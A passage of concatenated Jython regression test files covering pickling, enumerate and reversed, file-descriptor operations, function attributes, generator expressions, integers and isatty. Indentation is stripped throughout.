self.dumps = pickle.dumps
self.loads = pickle.loads
error = pickle.BadPickleGet
module = cPickle
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_callapi(self):
pass
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_dynamic_class(self):
pass
class cPicklePicklerTests(ApproxFloat, AbstractPickleTests):
def dumps(self, arg, proto=0):
f = StringIO()
p = pickle.Pickler(f, proto)
p.dump(arg)
f.seek(0)
return f.read()
def loads(self, buf):
f = StringIO(buf)
p = pickle.Unpickler(f)
return p.load()
error = pickle.BadPickleGet
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_dynamic_class(self):
pass
class cPickleListPicklerTests(AbstractPickleTests):
def dumps(self, arg, proto=0):
p = pickle.Pickler(proto)
p.dump(arg)
return p.getvalue()
def loads(self, *args):
f = StringIO(args[0])
p = pickle.Unpickler(f)
return p.load()
error = pickle.BadPickleGet
class cPickleFastPicklerTests(ApproxFloat, AbstractPickleTests):
def dumps(self, arg, proto=0):
f = StringIO()
p = pickle.Pickler(f, proto)
p.fast = 1
p.dump(arg)
f.seek(0)
return f.read()
def loads(self, *args):
f = StringIO(args[0])
p = pickle.Unpickler(f)
return p.load()
error = pickle.BadPickleGet
def test_recursive_list(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_list,
self)
def test_recursive_inst(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_inst,
self)
def test_recursive_dict(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_dict,
self)
def test_recursive_multi(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_multi,
self)
def test_nonrecursive_deep(self):
# If it's not cyclic, it should pickle OK even if the nesting
# depth exceeds PY_CPICKLE_FAST_LIMIT. That happens to be
# 50 today. <NAME> reported stack overflow on Mac OS 9
# at 64.
a = []
for i in range(60):
a = [a]
b = self.loads(self.dumps(a))
self.assertEqual(a, b)
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_dynamic_class(self):
pass
def test_main():
tests = [
cPickleTests,
cPicklePicklerTests,
cPickleListPicklerTests,
cPickleFastPicklerTests
]
if support.is_jython:
# FIXME Jython currently doesn't support list based picklers
tests.remove(cPickleListPicklerTests)
# FIXME these cause NullPointerException on Jython
del cPickleFastPicklerTests.test_recursive_list
del cPickleFastPicklerTests.test_recursive_inst
del cPickleFastPicklerTests.test_recursive_dict
del cPickleFastPicklerTests.test_recursive_multi
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_enumerate.py
```python
import unittest
import sys
from test import support
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class EnumerateTestCase(unittest.TestCase):
enum = enumerate
seq, res = 'abc', [(0, 'a'), (1, 'b'), (2, 'c')]
def test_basicfunction(self):
self.assertEqual(type(self.enum(self.seq)), self.enum)
e = self.enum(self.seq)
self.assertEqual(iter(e), e)
self.assertEqual(list(self.enum(self.seq)), self.res)
self.enum.__doc__
def test_getitemseqn(self):
self.assertEqual(list(self.enum(G(self.seq))), self.res)
e = self.enum(G(''))
self.assertRaises(StopIteration, e.__next__)
def test_iteratorseqn(self):
self.assertEqual(list(self.enum(I(self.seq))), self.res)
e = self.enum(I(''))
self.assertRaises(StopIteration, e.__next__)
def test_iteratorgenerator(self):
self.assertEqual(list(self.enum(Ig(self.seq))), self.res)
e = self.enum(Ig(''))
self.assertRaises(StopIteration, e.__next__)
def test_noniterable(self):
self.assertRaises(TypeError, self.enum, X(self.seq))
def test_illformediterable(self):
self.assertRaises(TypeError, list, self.enum(N(self.seq)))
def test_exception_propagation(self):
self.assertRaises(ZeroDivisionError, list, self.enum(E(self.seq)))
def test_argumentcheck(self):
self.assertRaises(TypeError, self.enum) # no arguments
self.assertRaises(TypeError, self.enum, 1) # wrong type (not iterable)
self.assertRaises(TypeError, self.enum, 'abc', 'a') # wrong type
self.assertRaises(TypeError, self.enum, 'abc', 2, 3) # too many arguments
def test_tuple_reuse(self):
# Tests an implementation detail where tuple is reused
# whenever nothing else holds a reference to it
self.assertEqual(len(set(map(id, list(enumerate(self.seq))))), len(self.seq))
self.assertEqual(len(set(map(id, enumerate(self.seq)))), min(1, len(self.seq)))
class MyEnum(enumerate):
pass
class SubclassTestCase(EnumerateTestCase):
enum = MyEnum
class TestEmpty(EnumerateTestCase):
seq, res = '', []
class TestBig(EnumerateTestCase):
seq = list(range(10, 20000, 2))
res = list(zip(list(range(20000)), seq))
class TestReversed(unittest.TestCase):
def test_simple(self):
class A:
def __getitem__(self, i):
if i < 5:
return str(i)
raise StopIteration
def __len__(self):
return 5
for data in 'abc', list(range(5)), tuple(enumerate('abc')), A(), range(1, 17, 5):
self.assertEqual(list(data)[::-1], list(reversed(data)))
self.assertRaises(TypeError, reversed, {})
def test_xrange_optimization(self):
x = range(1)
self.assertEqual(type(reversed(x)), type(iter(x)))
def test_len(self):
# This is an implementation detail, not an interface requirement
from test.test_iterlen import len
for s in ('hello', tuple('hello'), list('hello'), range(5)):
self.assertEqual(len(reversed(s)), len(s))
r = reversed(s)
list(r)
self.assertEqual(len(r), 0)
class SeqWithWeirdLen:
called = False
def __len__(self):
if not self.called:
self.called = True
return 10
raise ZeroDivisionError
def __getitem__(self, index):
return index
r = reversed(SeqWithWeirdLen())
self.assertRaises(ZeroDivisionError, len, r)
def test_gc(self):
class Seq:
def __len__(self):
return 10
def __getitem__(self, index):
return index
s = Seq()
r = reversed(s)
s.r = r
def test_args(self):
self.assertRaises(TypeError, reversed)
self.assertRaises(TypeError, reversed, [], 'extra')
def test_bug1229429(self):
# this bug was never in reversed, it was in
# PyObject_CallMethod, and reversed_new calls that sometimes.
if not hasattr(sys, "getrefcount"):
return
def f():
pass
r = f.__reversed__ = object()
rc = sys.getrefcount(r)
for i in range(10):
try:
reversed(f)
except TypeError:
pass
else:
self.fail("non-callable __reversed__ didn't raise!")
self.assertEqual(rc, sys.getrefcount(r))
def test_main(verbose=None):
if support.is_jython:
# XXX: CPython implementation details
del EnumerateTestCase.test_tuple_reuse
del TestReversed.test_len
testclasses = (EnumerateTestCase, SubclassTestCase, TestEmpty, TestBig,
TestReversed)
support.run_unittest(*testclasses)
# verify reference counting
import sys
if verbose and hasattr(sys, "gettotalrefcount"):
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*testclasses)
counts[i] = sys.gettotalrefcount()
print(counts)
if __name__ == "__main__":
test_main(verbose=True)
```
#### File: Lib/test/test_fileno.py
```python
import errno
import os
import sys
import tempfile
import test.support as support
import unittest
class TestFilenoTestCase(unittest.TestCase):
def setUp(self):
self.filename = tempfile.mktemp()
self.fp = open(self.filename, 'w+')
self.fd = self.fp.fileno()
def tearDown(self):
if self.fp:
self.fp.close()
os.remove(self.filename)
def test_ftruncate(self):
self.fp.write('jython filenos')
self.fp.flush()
os.fsync(self.fd)
self.assertEqual(os.path.getsize(self.filename), 14)
os.ftruncate(self.fd, 8)
self.assertEqual(os.path.getsize(self.filename), 8)
os.ftruncate(self.fd, 0)
self.assertEqual(os.path.getsize(self.filename), 0)
self.fp.close()
raises(OSError, 9, os.ftruncate, self.fd, 0)
def test_lseek(self):
self.assertEqual(os.lseek(self.fd, 0, 1), 0)
os.write(self.fd, 'jython filenos')
os.lseek(self.fd, 7, 0)
self.assertEqual(os.read(self.fd, 7), 'filenos')
self.fp.close()
raises(OSError, 9, os.lseek, self.fd, 0, 1)
def test_read(self):
self.fp.write('jython filenos')
self.fp.flush()
self.fp.seek(0)
result = os.read(self.fd, 7)
self.assertTrue(isinstance(result, str))
self.assertEqual(result, 'jython ')
self.assertEqual(os.read(self.fd, 99), 'filenos')
self.fp.close()
raises(OSError, 9, os.read, self.fd, 1)
def test_write(self):
os.write(self.fd, 'jython filenos')
self.fp.seek(0)
self.assertEqual(self.fp.read(), 'jython filenos')
self.fp.close()
raises(OSError, 9, os.write, self.fd, 'The Larch')
class TestOsOpenTestCase(unittest.TestCase):
def setUp(self):
self.filename = tempfile.mktemp()
self.dir = None
self.fd = None
def tearDown(self):
if self.fd:
try:
os.close(self.fd)
except:
pass
if os.path.exists(self.filename):
os.remove(self.filename)
if self.dir:
os.rmdir(self.dir)
def test_open(self):
# XXX: assert the mode of the file
self.fd = os.open(self.filename, os.O_WRONLY | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
os.write(self.fd, 'jython')
os.close(self.fd)
self.fd = os.open(self.filename, os.O_WRONLY | os.O_APPEND)
os.write(self.fd, ' filenos')
os.close(self.fd)
fp = open(self.filename)
self.assertEqual(fp.read(), 'jython filenos')
fp.close()
# falls back to read only without O_WRONLY/O_RDWR
self.fd = os.open(self.filename, os.O_APPEND)
raises(OSError, 9, os.write, self.fd, 'new')
# Acts as append on windows (seeks to the end)
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('jython filenos')), 'jython filenos')
os.close(self.fd)
# falls back to read only without O_WRONLY/O_RDWR
self.fd = os.open(self.filename, os.O_CREAT)
raises(OSError, 9, os.write, self.fd, 'new')
self.assertEqual(os.read(self.fd, len('jython filenos')), 'jython filenos')
os.close(self.fd)
# interpreted as RDWR
self.fd = os.open(self.filename, os.O_RDONLY | os.O_RDWR)
os.write(self.fd, 'test')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, 4), 'test')
os.close(self.fd)
def test_open_truncate(self):
fp = open(self.filename, 'w')
fp.write('hello')
fp.close()
self.assertEqual(os.path.getsize(self.filename), 5)
self.fd = os.open(self.filename, os.O_TRUNC | os.O_RDWR)
self.assertEqual(os.path.getsize(self.filename), 0)
os.write(self.fd, 'truncated')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('truncated')), 'truncated')
os.close(self.fd)
self.fd = os.open(self.filename, os.O_TRUNC | os.O_WRONLY)
self.assertEqual(os.path.getsize(self.filename), 0)
os.write(self.fd, 'write only truncated')
raises(OSError, 9, os.read, self.fd, 99)
os.close(self.fd)
fd = open(self.filename)
self.assertEqual(fd.read(), 'write only truncated')
fd.close()
# Both fail on Windows, errno 22
"""
# falls back to read only without O_WRONLY/O_RDWR, but truncates
self.fd = os.open(self.filename, os.O_TRUNC)
self.assertEquals(os.path.getsize(self.filename), 0)
raises(OSError, 9, os.write, self.fd, 'new')
self.assertEquals(os.read(self.fd, 99), '')
os.close(self.fd)
fp = open(self.filename, 'w')
fp.write('and ')
fp.close()
self.assertEquals(os.path.getsize(self.filename), 4)
# append with no write falls back to read, but still truncates
self.fd = os.open(self.filename, os.O_TRUNC | os.O_APPEND)
self.assertEquals(os.path.getsize(self.filename), 0)
raises(OSError, 9, os.write, self.fd, 'new')
os.close(self.fd)
fp = open(self.filename, 'w')
fp.write('and ')
fp.close()
self.assertEquals(os.path.getsize(self.filename), 4)
"""
def test_open_exclusive(self):
self.assertTrue(not os.path.exists(self.filename))
# fails without O_CREAT
raises(OSError, (2, self.filename), os.open, self.filename, os.O_EXCL)
self.assertTrue(not os.path.exists(self.filename))
# creates, read only
self.fd = os.open(self.filename, os.O_EXCL | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
raises(OSError, 9, os.write, self.fd, 'jython')
self.assertEqual(os.read(self.fd, 99), '')
os.close(self.fd)
# not exclusive unless creating
os.close(os.open(self.filename, os.O_EXCL))
raises(OSError, (17, self.filename),
os.open, self.filename, os.O_CREAT | os.O_EXCL)
raises(OSError, (17, self.filename),
os.open, self.filename, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
raises(OSError, (17, self.filename),
os.open, self.filename, os.O_CREAT | os.O_RDWR | os.O_EXCL)
os.remove(self.filename)
self.fd = os.open(self.filename, os.O_EXCL | os.O_RDWR | os.O_CREAT)
os.write(self.fd, 'exclusive')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('exclusive')), 'exclusive')
def test_open_sync(self):
if not hasattr(os, 'O_SYNC'):
return
# Just ensure this works
self.fd = os.open(self.filename, os.O_SYNC | os.O_WRONLY | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
os.write(self.fd, 'jython')
raises(OSError, 9, os.read, self.fd, 99)
os.close(self.fd)
os.remove(self.filename)
self.fd = os.open(self.filename, os.O_SYNC | os.O_RDWR | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
os.write(self.fd, 'jython')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('jython')), 'jython')
os.close(self.fd)
def test_open_sync_dir(self):
if not hasattr(os, 'O_SYNC'):
return
self.dir = tempfile.mkdtemp()
try:
self.fd = os.open(self.dir, os.O_SYNC | os.O_RDWR)
except OSError as ose:
assert ose.errno == errno.EISDIR, ose.errno
def test_bad_open(self):
for mode in (os.O_WRONLY, os.O_WRONLY, os.O_RDWR):
raises(OSError, (2, self.filename), os.open, self.filename, mode)
open(self.filename, 'w').close()
raises(OSError, (22, self.filename),
os.open, self.filename, os.O_WRONLY | os.O_RDWR)
class TestOsFdopenTestCase(unittest.TestCase):
def setUp(self):
self.filename = tempfile.mktemp()
self.fd = None
def tearDown(self):
if self.fd:
try:
os.close(self.fd)
except:
pass
if os.path.exists(self.filename):
os.remove(self.filename)
def test_fdopen(self):
origw_fp = open(self.filename, 'w')
origw = origw_fp.fileno()
origr_fp = open(self.filename, 'r')
origr = origr_fp.fileno()
# Mode must begin with rwa
raises(ValueError, "invalid file mode 'b'",
os.fdopen, origr, 'b')
# Refuse modes the original file doesn't support
# XXX: allowed on windows CPython
"""
raises(OSError, '[Errno 22] Invalid argument',
os.fdopen, origw, 'r')
raises(OSError, '[Errno 22] Invalid argument',
os.fdopen, origr, 'w')
"""
fp = os.fdopen(origw, 'w')
fp.write('fdopen')
# Windows CPython doesn't raise an exception here
#raises(IOError, '[Errno 9] Bad file descriptor',
# fp.read, 7)
fp.close()
fp = os.fdopen(origr)
self.assertEqual(fp.read(), 'fdopen')
# Windows CPython raises IOError [Errno 0] Error
#raises(IOError, '[Errno 9] Bad file descriptor',
# fp.write, 'test')
raises(IOError, None,
fp.write, 'test')
fp.close()
# Windows CPython raises OSError [Errno 0] Error for both these
#raises(OSError, '[Errno 9] Bad file descriptor',
# os.fdopen, origw, 'w')
#raises(OSError, '[Errno 9] Bad file descriptor',
# os.fdopen, origr, 'r')
raises(OSError, None,
os.fdopen, origw, 'w')
raises(OSError, None,
os.fdopen, origr, 'r')
# These all raise IO/OSErrors on FreeBSD
try:
origw_fp.close()
except:
pass
try:
origr_fp.close()
except:
pass
try:
os.close(origw)
except:
pass
try:
os.close(origr)
except:
pass
def raises(exc, expected, callable, *args):
"""Ensure the specified call raises exc.
expected is compared against the exception message if not None. It
can be a str, an errno or a 2 item tuple of errno/filename. The
latter two being for comparison against EnvironmentErrors.
"""
if expected:
if isinstance(expected, str):
msg = expected
else:
errno = expected[0] if isinstance(expected, tuple) else expected
msg = '[Errno %d] %s' % (errno, os.strerror(errno))
if isinstance(expected, tuple):
msg += ': %r' % expected[1]
try:
callable(*args)
except exc as val:
if expected and str(val) != msg:
raise support.TestFailed(
"Message %r, expected %r" % (str(val), msg))
else:
raise support.TestFailed("Expected %s" % exc)
def test_main():
support.run_unittest(TestFilenoTestCase,
TestOsOpenTestCase,
TestOsFdopenTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_funcattrs.py
```python
from test import support
import types
import unittest
class FuncAttrsTest(unittest.TestCase):
def setUp(self):
class F:
def a(self):
pass
def b():
return 3
self.f = F
self.fi = F()
self.b = b
def cannot_set_attr(self, obj, name, value, exceptions):
# Helper method for other tests.
try:
setattr(obj, name, value)
except exceptions:
pass
else:
self.fail("shouldn't be able to set %s to %r" % (name, value))
try:
delattr(obj, name)
except exceptions:
pass
else:
self.fail("shouldn't be able to del %s" % name)
class FunctionPropertiesTest(FuncAttrsTest):
# Include the external setUp method that is common to all tests
def test_module(self):
self.assertEqual(self.b.__module__, __name__)
def test_dir_includes_correct_attrs(self):
self.b.known_attr = 7
self.assertIn('known_attr', dir(self.b),
"set attributes not in dir listing of method")
# Test on underlying function object of method
self.f.a.__func__.known_attr = 7
self.assertIn('known_attr', dir(self.f.a),
"set attribute on unbound method implementation in "
"class not in dir")
self.assertIn('known_attr', dir(self.fi.a),
"set attribute on unbound method implementations, "
"should show up in next dir")
def test_duplicate_function_equality(self):
# Body of `duplicate' is the exact same as self.b
def duplicate():
'my docstring'
return 3
self.assertNotEqual(self.b, duplicate)
def test_copying_func_code(self):
def test(): pass
self.assertEqual(test(), None)
test.__code__ = self.b.__code__
self.assertEqual(test(), 3) # self.b always returns 3, arbitrarily
def test_func_globals(self):
self.assertIs(self.b.__globals__, globals())
self.cannot_set_attr(self.b, 'func_globals', 2, TypeError)
def test_func_closure(self):
a = 12
def f(): print(a)
c = f.__closure__
self.assertIsInstance(c, tuple)
self.assertEqual(len(c), 1)
# don't have a type object handy
self.assertEqual(c[0].__class__.__name__, "cell")
self.cannot_set_attr(f, "func_closure", c, TypeError)
def test_empty_cell(self):
def f(): print(a)
try:
f.__closure__[0].cell_contents
except ValueError:
pass
else:
self.fail("shouldn't be able to read an empty cell")
a = 12
def test_func_name(self):
self.assertEqual(self.b.__name__, 'b')
self.assertEqual(self.b.__name__, 'b')
self.b.__name__ = 'c'
self.assertEqual(self.b.__name__, 'c')
self.assertEqual(self.b.__name__, 'c')
self.b.__name__ = 'd'
self.assertEqual(self.b.__name__, 'd')
self.assertEqual(self.b.__name__, 'd')
# __name__ and func_name must be a string
self.cannot_set_attr(self.b, '__name__', 7, TypeError)
self.cannot_set_attr(self.b, 'func_name', 7, TypeError)
# __name__ must be available when in restricted mode. Exec will raise
# AttributeError if __name__ is not available on f.
s = """def f(): pass\nf.__name__"""
exec(s, {'__builtins__': {}})
# Test on methods, too
self.assertEqual(self.f.a.__name__, 'a')
self.assertEqual(self.fi.a.__name__, 'a')
self.cannot_set_attr(self.f.a, "__name__", 'a', AttributeError)
self.cannot_set_attr(self.fi.a, "__name__", 'a', AttributeError)
def test_func_code(self):
num_one, num_two = 7, 8
def a(): pass
def b(): return 12
def c(): return num_one
def d(): return num_two
def e(): return num_one, num_two
for func in [a, b, c, d, e]:
self.assertEqual(type(func.__code__), types.CodeType)
self.assertEqual(c(), 7)
self.assertEqual(d(), 8)
d.__code__ = c.__code__
self.assertEqual(c.__code__, d.__code__)
self.assertEqual(c(), 7)
# self.assertEqual(d(), 7)
try:
b.__code__ = c.__code__
except ValueError:
pass
else:
self.fail("func_code with different numbers of free vars should "
"not be possible")
try:
e.__code__ = d.__code__
except ValueError:
pass
else:
self.fail("func_code with different numbers of free vars should "
"not be possible")
def test_blank_func_defaults(self):
self.assertEqual(self.b.__defaults__, None)
del self.b.__defaults__
self.assertEqual(self.b.__defaults__, None)
def test_func_default_args(self):
def first_func(a, b):
return a+b
def second_func(a=1, b=2):
return a+b
self.assertEqual(first_func.__defaults__, None)
self.assertEqual(second_func.__defaults__, (1, 2))
first_func.__defaults__ = (1, 2)
self.assertEqual(first_func.__defaults__, (1, 2))
self.assertEqual(first_func(), 3)
self.assertEqual(first_func(3), 5)
self.assertEqual(first_func(3, 5), 8)
del second_func.__defaults__
self.assertEqual(second_func.__defaults__, None)
try:
second_func()
except TypeError:
pass
else:
self.fail("func_defaults does not update; deleting it does not "
"remove requirement")
class InstancemethodAttrTest(FuncAttrsTest):
def test_im_class(self):
self.assertEqual(self.f.a.__self__.__class__, self.f)
self.assertEqual(self.fi.a.__self__.__class__, self.f)
self.cannot_set_attr(self.f.a, "im_class", self.f, TypeError)
self.cannot_set_attr(self.fi.a, "im_class", self.f, TypeError)
def test_im_func(self):
self.f.b = self.b
self.assertEqual(self.f.b.__func__, self.b)
self.assertEqual(self.fi.b.__func__, self.b)
self.cannot_set_attr(self.f.b, "im_func", self.b, TypeError)
self.cannot_set_attr(self.fi.b, "im_func", self.b, TypeError)
def test_im_self(self):
self.assertEqual(self.f.a.__self__, None)
self.assertEqual(self.fi.a.__self__, self.fi)
self.cannot_set_attr(self.f.a, "im_self", None, TypeError)
self.cannot_set_attr(self.fi.a, "im_self", self.fi, TypeError)
def test_im_func_non_method(self):
# Behavior should be the same when a method is added via an attr
# assignment
self.f.id = types.MethodType(id, None, self.f)
self.assertEqual(self.fi.id(), id(self.fi))
self.assertNotEqual(self.fi.id(), id(self.f))
# Test usage
try:
self.f.id.unknown_attr
except AttributeError:
pass
else:
self.fail("using unknown attributes should raise AttributeError")
# Test assignment and deletion
self.cannot_set_attr(self.f.id, 'unknown_attr', 2, AttributeError)
self.cannot_set_attr(self.fi.id, 'unknown_attr', 2, AttributeError)
def test_implicit_method_properties(self):
self.f.a.__func__.known_attr = 7
self.assertEqual(self.f.a.known_attr, 7)
self.assertEqual(self.fi.a.known_attr, 7)
class ArbitraryFunctionAttrTest(FuncAttrsTest):
def test_set_attr(self):
# setting attributes only works on function objects
self.b.known_attr = 7
self.assertEqual(self.b.known_attr, 7)
for func in [self.f.a, self.fi.a]:
try:
func.known_attr = 7
except AttributeError:
pass
else:
self.fail("setting attributes on methods should raise error")
def test_delete_unknown_attr(self):
try:
del self.b.unknown_attr
except AttributeError:
pass
else:
self.fail("deleting unknown attribute should raise TypeError")
def test_setting_attrs_duplicates(self):
try:
self.f.a.klass = self.f
except AttributeError:
pass
else:
self.fail("setting arbitrary attribute in unbound function "
" should raise AttributeError")
self.f.a.__func__.klass = self.f
for method in [self.f.a, self.fi.a, self.fi.a.__func__]:
self.assertEqual(method.klass, self.f)
def test_unset_attr(self):
for func in [self.b, self.f.a, self.fi.a]:
try:
func.non_existent_attr
except AttributeError:
pass
else:
self.fail("using unknown attributes should raise "
"AttributeError")
class FunctionDictsTest(FuncAttrsTest):
def test_setting_dict_to_invalid(self):
self.cannot_set_attr(self.b, '__dict__', None, TypeError)
self.cannot_set_attr(self.b, 'func_dict', None, TypeError)
from UserDict import UserDict
d = UserDict({'known_attr': 7})
self.cannot_set_attr(self.f.a.__func__, '__dict__', d, TypeError)
self.cannot_set_attr(self.fi.a.__func__, '__dict__', d, TypeError)
def test_setting_dict_to_valid(self):
d = {'known_attr': 7}
self.b.__dict__ = d
# Setting dict is only possible on the underlying function objects
self.f.a.__func__.__dict__ = d
# Test assignment
self.assertIs(d, self.b.__dict__)
self.assertIs(d, self.b.__dict__)
# ... and on all the different ways of referencing the method's func
self.assertIs(d, self.f.a.__func__.__dict__)
self.assertIs(d, self.f.a.__dict__)
self.assertIs(d, self.fi.a.__func__.__dict__)
self.assertIs(d, self.fi.a.__dict__)
# Test value
self.assertEqual(self.b.known_attr, 7)
self.assertEqual(self.b.__dict__['known_attr'], 7)
self.assertEqual(self.b.__dict__['known_attr'], 7)
# ... and again, on all the different method's names
self.assertEqual(self.f.a.__func__.known_attr, 7)
self.assertEqual(self.f.a.known_attr, 7)
self.assertEqual(self.fi.a.__func__.known_attr, 7)
self.assertEqual(self.fi.a.known_attr, 7)
def test_delete_func_dict(self):
try:
del self.b.__dict__
except TypeError:
pass
else:
self.fail("deleting function dictionary should raise TypeError")
try:
del self.b.__dict__
except TypeError:
pass
else:
self.fail("deleting function dictionary should raise TypeError")
def test_unassigned_dict(self):
self.assertEqual(self.b.__dict__, {})
def test_func_as_dict_key(self):
value = "Some string"
d = {}
d[self.b] = value
self.assertEqual(d[self.b], value)
class FunctionDocstringTest(FuncAttrsTest):
def test_set_docstring_attr(self):
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.__doc__, None)
docstr = "A test method that does nothing"
self.b.__doc__ = self.f.a.__func__.__doc__ = docstr
self.assertEqual(self.b.__doc__, docstr)
self.assertEqual(self.b.__doc__, docstr)
self.assertEqual(self.f.a.__doc__, docstr)
self.assertEqual(self.fi.a.__doc__, docstr)
# Jython is more uniform in its attribute model than CPython.
# Unfortunately we have more tests depending on such attempted
# settings of read-only attributes resulting in a TypeError
# than an AttributeError. But fixing this seems pointless for
# now, deferring to Jython 3.x. See
# http://bugs.python.org/issue1687163
self.cannot_set_attr(self.f.a, "__doc__", docstr, TypeError)
self.cannot_set_attr(self.fi.a, "__doc__", docstr, TypeError)
def test_delete_docstring(self):
self.b.__doc__ = "The docstring"
del self.b.__doc__
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.__doc__, None)
self.b.__doc__ = "The docstring"
del self.b.__doc__
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.__doc__, None)
class StaticMethodAttrsTest(unittest.TestCase):
def test_func_attribute(self):
def f():
pass
c = classmethod(f)
self.assertTrue(c.__func__ is f)
s = staticmethod(f)
self.assertTrue(s.__func__ is f)
def test_main():
support.run_unittest(FunctionPropertiesTest, InstancemethodAttrTest,
ArbitraryFunctionAttrTest, FunctionDictsTest,
FunctionDocstringTest,
StaticMethodAttrsTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_genexps_jy.py
```python
import unittest
from test import support
locals_test = list(local for local in locals() if not local.startswith('_'))
class GeneratorExpressionsTestCase(unittest.TestCase):
def test_module_level_locals(self):
# NOTE: The locals_test genexp used to cause a 'dictionary
# changed size during iteration' RuntimeError. If we've gotten
# this far we've already passed
self.assertTrue(sorted(locals_test) == ['support', 'unittest'])
#http://bugs.jython.org/issue1205 applied to genexps.
def test_long_genexp(self):
#for a long genexp, we compute the Hardy-Ramanujan number
#http://en.wikipedia.org/wiki/1729_(number)
res = ((x1**3+x2**3, (x1, x2), (y1, y2))
for x1 in range(20) for x2 in range(20) if x1 < x2 # x-Paare
for y1 in range(20) for y2 in range(20) if y1 < y2 # y-Paare
if x1**3+x2**3 == y1**3+y2**3 # gleiche Summe
if (x1, x2) < (y1, y2)
)
self.assertEqual(1729, res.next()[0])
def test_main():
support.run_unittest(GeneratorExpressionsTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_int_jy.py
```python
import unittest
import types
from test import support
class IntTestCase(unittest.TestCase):
def test_type_matches(self):
self.assertTrue(isinstance(1, int))
def test_int_pow(self):
self.assertEqual(pow(10, 10, None), 10000000000)
self.assertEqual(int.__pow__(10, 10, None), 10000000000)
self.assertEqual((10).__pow__(10, None), 10000000000)
def test_main():
support.run_unittest(IntTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_isatty.py
```python
import test.support, unittest
import os, popen2, subprocess, sys
def test_isatty(label, thingy):
os_isatty = os.isatty(thingy.fileno())
thingy_isatty = thingy.isatty()
if 'in' in label: expected = stdin_isatty
elif 'out' in label: expected = stdout_isatty
elif 'err' in label: expected = stderr_isatty
else: expected = False
print('%11s: os.isatty=%.1s | .isatty=%.1s | expected=%.1s' % \
(label, os_isatty, thingy_isatty, expected))
assert expected == os_isatty == thingy_isatty, \
'expected isatty would return %s on %s' % (expected, label)
def test_int_isatty(fd, expected):
os_isatty = os.isatty(fd)
print('%11s: os.isatty=%.1s | expected=%.1s' % \
('fd %d' % fd, os_isatty, expected))
assert expected == os_isatty
def test_file_isatty(name):
if not os.path.exists(name):
return
try:
test_isatty(name, file(name))
except IOError as e:
print(e) # XXX Jython prints 'no such file or directory' - probably
# 'permission denied' but Java doesn't understand?
def args_list(*args):
return [sys.executable, __file__] + list(map(str, args))
class IsattyTest(unittest.TestCase):
def check_call(self, *args, **kw):
self.assertEqual(subprocess.check_call(args_list(*args), **kw), 0)
def test_isatty(self):
if os.name == 'java': # Jython doesn't allocate ptys here
self.check_call(False, False, False)
# XXX not sure how to test anything else
else:
self.check_call(True, True, True)
self.check_call(False, True, True, stdin=subprocess.PIPE)
self.check_call(True, False, True, stdout=subprocess.PIPE)
self.check_call(True, True, False, stderr=subprocess.PIPE)
if __name__ == '__main__':
if len(sys.argv) != 4:
test.support.run_unittest(IsattyTest)
sys.exit(0)
stdin_isatty, stdout_isatty, stderr_isatty = [x == 'True' for x in sys.argv[1:]]
test_isatty('stdin', sys.stdin)
test_isatty('stdout', sys.stdout)
test_isatty('stderr', sys.stderr)
test_int_isatty(0, stdin_isatty)
test_int_isatty(1, stdout_isatty)
test_int_isatty(2, stderr_isatty)
test_file_isatty('/dev/stdin')
test_file_isatty('/dev/stdout')
test_file_isatty('/dev/stderr')
try:
from java.lang import System
test_isatty('System.in', file(getattr(System, 'in')))
test_isatty('System.out', file(System.out, 'w'))
test_isatty('System.err', file(System.err, 'w'))
from java.io import FileDescriptor, FileInputStream, FileOutputStream
fd_in = getattr(FileDescriptor, 'in')
fd_out = FileDescriptor.out
fd_err = FileDescriptor.err
test_isatty('FIS(FD.in)', file(FileInputStream(fd_in)))
test_isatty('FOS(FD.out)', file(FileOutputStream(fd_out)))
test_isatty('FOS(FD.err)', file(FileOutputStream(fd_err)))
except ImportError:
pass
test_file_isatty('/dev/null')
sys.exit(0)
```
#### File: Lib/test/test_jbasic.py
```python
import unittest
from test import support
from java.awt import Dimension
from java.awt.event import ActionEvent
from java.lang import Integer, String
from java.lang.Math import abs
